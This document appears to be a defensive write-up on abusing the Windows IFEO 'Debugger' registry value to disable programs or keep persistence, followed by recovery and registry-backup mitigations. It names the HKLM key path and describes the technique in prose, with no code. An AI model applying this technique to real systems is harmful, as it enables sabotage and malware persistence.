IFEO Exploit Payload Sample

An in-depth look at a malicious payload using Windows Image File Execution Options (IFEO) as an attack vector for executing Denial of Service (DoS) attacks on system programs.

Analysis:

Windows enables power users to automatically attach debuggers to invoked programs through the use of IFEO. IFEO is a feature that can be found in Windows NT operating systems version 5.0 (Windows 2000) and later. During the creation of a process, a call to NtCreateUserProcess is eventually made, which is an undocumented function contained in the native Windows API. NtCreateUserProcess is not only responsible for informing the Windows subsystem of the type of image to be executed (MS-DOS, Windows 3.1, Windows EXE), but it is also responsible for performing a preliminary check inside of the local machine's registry hive containing the IFEO as a penultimate step for creating the process. If a subkey with the name and extension of the executable image exists then a check for a string value named Debugger is made, and if found, the creation process will restart with the string value being the new image to be executed. Using programs shipped with Windows such as the Registry Editor, Command Prompt, PowerShell, or other programs, users may access the IFEO subkey containing several subkeys with the name of an executable image.

IFEO Subkey Path:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options

By creating and opening a program subkey, or opening a pre-existing program subkey, a string value can be created with the name Debugger and its data can then be set to the path of a debugger.

While serving purpose for legitimate uses, IFEO can also be used undesirably as well, creating an attack vector for malicious programs to execute DoS attacks on both installed and core system programs as part of ransomware or other forms of malware. Threat actors can also use IFEO to register their own values in place of a debugger to avoid detection, make removal difficult, trick victims into elevating privileges, or disabling core system programs; making Windows unstable or rendered inoperable. Exploiting IFEO requires a threat actor to gain access to an administrator's access token in order to modify the HKLM registry hive and can be done via other attack vectors such as social engineering and User Account Control (UAC) exploits. At this point, a threat actor already has full control of a victim's system.

Reversing Modifications:

If a victim can access the HKLM registry hive, then the modifications can be easily reversed. If access is not possible, victims can create a copy of the HKLM hive file and, on a separate system, load the hive file to reverse the modifications.

Select the target hive to import from the tree view.

From the menu strip, go to File > Load Hive...

From here, a Windows Explorer dialog will be presented, allowing users to select a hive file to load from any disk location. The location of these hive files will be covered below.

Mitigation:

User awareness is the first step in preventing threat actors from being able to execute malicious tasks on a system. However, user awareness is not always possible, hence the existence of antivirus (AV) software and firewalls. Though these types of attacks are not common and are easily detected by current generation AV software or groups such as Microsoft Security Intelligence, steps should be taken to prevent and recoup from an attack. This requires that users ensure they have the latest definitions from their AV vendor and to also create regular registry backups. Windows 10 version 1709 and earlier major releases automatically create registry hive file backups located in %WINDIR%\System32\config\RegBack. Starting with Windows 10 version 1803, Microsoft has purposely disabled automatic registry hive file backups by default in attempt to lower the overall disk footprint of Windows. By modifying a flag within the HKLM hive, this feature can be restored and is also recommended for reasons beyond the scope of this document.

Enabling automatic registry hive file backups requires modifying the Configuration Manager subkey: HKLM\System\CurrentControlSet\Control\Session Manager\Configuration Manager

This subkey contains a 32-bit integer with EnablePeriodicBackup as the given name. Setting this flag will enable registry hive file backups on a set schedule.

If this subkey and\or flag does not exist, it is safe to create them manually. Once enabled, it is recommended that registry hive file backups be copied to a separate location as the RegBack folder can still be purged by a threat actor.

If Windows is still not creating registry hive file backups automatically after modifying the above subkey then the Registry Idle Backup Task must be enabled and configured which can be done via Windows Task Scheduler. The path to the Registry Idle Backup task is Task Scheduler Library\Microsoft\Windows\Registry.

It is also worth mentioning that attacks could be negated entirely if the NtCreateUserProcess function were to still execute the invoked program if a debugger could not be located or if IFEO stood behind Windows Developer Mode and zero trust was implemented so that users are required to authenticate themselves when enabling Developer Mode. This is a flaw that Microsoft, even today, does not consider a vulnerability. It is also safe to assume the former given the long existence of the flaw and lack of proper testing. Though Microsoft may not deem the flaw as a vulnerability, the National Information Assurance Training and Education Center (NIATEC) says otherwise.